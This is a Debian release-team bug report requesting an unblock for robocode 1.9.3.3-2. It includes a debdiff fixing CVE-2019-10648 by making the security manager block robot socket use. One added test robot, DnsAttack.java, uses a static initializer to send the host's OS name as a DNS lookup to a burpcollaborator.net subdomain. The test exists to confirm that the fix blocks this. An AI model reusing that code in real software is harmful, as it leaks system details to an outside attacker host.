Bug#926688: unblock: robocode/1.9.3.3-2

Mon, 08 Apr 2019 16:39:29 -0700 

Package: release.debian.org
Severity: normal
User: release.debian....@packages.debian.org
Usertags: unblock

Please unblock package robocode

Robocode in Buster is affected by CVE-2019-10648. The fix applied
cleanly and all tests pass. This is Debian bug 926088.

Thank you.

unblock robocode/1.9.3.3-2

-- System Information:
Debian Release: buster/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), 
LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect

diff -Nru robocode-1.9.3.3/debian/changelog robocode-1.9.3.3/debian/changelog
--- robocode-1.9.3.3/debian/changelog   2018-09-13 13:52:33.000000000 +0200
+++ robocode-1.9.3.3/debian/changelog   2019-04-08 00:13:19.000000000 +0200
@@ -1,3 +1,13 @@
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+  * Fix CVE-2019-10648:
+    Robocode allows remote attackers to cause external service interaction
+    (DNS), as demonstrated by a query for a unique subdomain name within an
+    attacker-controlled DNS zone, because of a .openStream call within
+    java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <a...@debian.org>  Mon, 08 Apr 2019 00:13:19 +0200
+
 robocode (1.9.3.3-1) unstable; urgency=medium
 
   * New upstream version 1.9.3.3.
diff -Nru robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 
robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch
--- robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch        1970-01-01 
01:00:00.000000000 +0100
+++ robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch        2019-04-08 
00:13:19.000000000 +0200
@@ -0,0 +1,235 @@
+From: Markus Koschany <a...@debian.org>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: 
https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java     | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java     | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java     | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java    | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java     | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 
robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git 
a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
 
b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- 
a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
++++ 
b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+ 
++import java.net.SocketPermission;
+ import java.security.AccessControlException;
++import java.security.Permission;
+ 
+ 
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+               }
+ 
+               Thread c = Thread.currentThread();
+-
+               if (isSafeThread(c)) {
+                       return;
+               }
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+                       if (robotProxy != null) {
+                               robotProxy.punishSecurityViolation(message);
+                       }
+-                      throw new AccessControlException(message);
++                      throw new SecurityException(message);
+               }
+       }
+ 
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+                       return;
+               }
+               Thread c = Thread.currentThread();
+-
+               if (isSafeThread(c)) {
+                       return;
+               }
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends 
SecurityManager {
+                       String message = "Robots are only allowed to create up 
to 5 threads!";
+ 
+                       robotProxy.punishSecurityViolation(message);
+-                      throw new AccessControlException(message);
++                      throw new SecurityException(message);
+               }
+       }
++      
++    public void checkPermission(Permission perm) {
++              if (RobocodeProperties.isSecurityOff()) {
++                      return;
++              }
++              Thread c = Thread.currentThread();
++              if (isSafeThread(c)) {
++                      return;
++              }
++        super.checkPermission(perm);
++
++        if (perm instanceof SocketPermission) {
++              IHostedThread robotProxy = 
threadManager.getLoadedOrLoadingRobotProxy(c);
++              String message = "Using socket is not allowed";
++              robotProxy.punishSecurityViolation(message);
++            throw new SecurityException(message);
++        }
++    }
+ 
+       private boolean isSafeThread(Thread c) {
+               return threadManager.isSafeThread(c);
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java 
b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
++package tested.robots;
++
++public class DnsAttack extends robocode.Robot {
++      static {
++              try {
++                      new java.net.URL("http://"; + 
System.getProperty("os.name").replaceAll(" ", ".")
++                                      + 
".randomsubdomain.burpcollaborator.net").openStream();
++              } catch (Exception e) {
++              }
++      }
++
++      public void run() {
++              for (;;) {
++                      ahead(100);
++                      back(100);
++              }
++      }
++}
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ 
+       private boolean messagedInitialization;
+-      private boolean messagedAccessDenied;
++      private boolean securityExceptionOccurred;
+       
+       @Override
+       public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends 
RobocodeTestBed {
+                       messagedInitialization = true;  
+               }       
+ 
+-              if (out.contains("access denied (java.net.SocketPermission")
+-                              || out.contains("access denied 
(\"java.net.SocketPermission\"")) {
+-                      messagedAccessDenied = true;    
++              if (out.contains("java.lang.SecurityException:")) {
++                      securityExceptionOccurred = true;       
+               }       
+       }
+ 
+       @Override
+       protected void runTeardown() {
+               Assert.assertTrue("Error during initialization", 
messagedInitialization);
+-              Assert.assertTrue("HTTP connection is not allowed", 
messagedAccessDenied);
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
+       }
+ 
+       @Override
+       protected int getExpectedErrors() {
+-              return hasJavaNetURLPermission ? 3 : 2; // Security error must 
be reported as an error
++              return 2;
+       }
+ }
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+  */
+ public class TestHttpAttack extends RobocodeTestBed {
+ 
+-      private boolean messagedAccessDenied;
++      private boolean securityExceptionOccurred;
+       
+       @Override
+       public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+ 
+               final String out = 
event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+ 
+-              if (out.contains("access denied (java.net.SocketPermission")
+-                              || out.contains("access denied 
(\"java.net.SocketPermission\"")) {
+-                      messagedAccessDenied = true;    
++              if (out.contains("java.lang.SecurityException:")) {
++                      securityExceptionOccurred = true;       
+               }       
+       }
+ 
+       @Override
+       protected void runTeardown() {
+-              Assert.assertTrue("HTTP connection is not allowed", 
messagedAccessDenied);
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
+       }
+ 
+       @Override
+       protected int getExpectedErrors() {
+-              return hasJavaNetURLPermission ? 2 : 1; // Security error must 
be reported as an error. Java 8 reports two errors.
++              return 1;
+       }
+ }
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
++/**
++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
++ * All rights reserved. This program and the accompanying materials
++ * are made available under the terms of the Eclipse Public License v1.0
++ * which accompanies this distribution, and is available at
++ * https://robocode.sourceforge.io/license/epl-v10.html
++ */
++package net.sf.robocode.test.robots;
++
++import net.sf.robocode.test.helpers.RobocodeTestBed;
++import org.junit.Assert;
++import robocode.control.events.TurnEndedEvent;
++
++/**
++ * @author Flemming N. Larsen (original)
++ */
++public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
++
++      private boolean securityExceptionOccurred;
++      
++      @Override
++      public String getRobotNames() {
++              return "tested.robots.DnsAttack,sample.Target";
++      }
++
++      @Override
++      public void onTurnEnded(TurnEndedEvent event) {
++              super.onTurnEnded(event);
++
++              final String out = 
event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
++
++              if (out.contains("SYSTEM: Using socket is not allowed")) {
++                      securityExceptionOccurred = true;       
++              }       
++      }
++
++      @Override
++      protected void runTeardown() {
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
++      }
++
++      @Override
++      protected int getExpectedErrors() {
++              return 1;
++      }
++}
diff -Nru robocode-1.9.3.3/debian/patches/series 
robocode-1.9.3.3/debian/patches/series
--- robocode-1.9.3.3/debian/patches/series      2018-09-13 13:52:33.000000000 
+0200
+++ robocode-1.9.3.3/debian/patches/series      2019-04-08 00:13:19.000000000 
+0200
@@ -1,3 +1,4 @@
 showJavaDocumentation.patch
 maven-assembly.patch
 ecj.patch
+CVE-2019-10648.patch

Reply via email to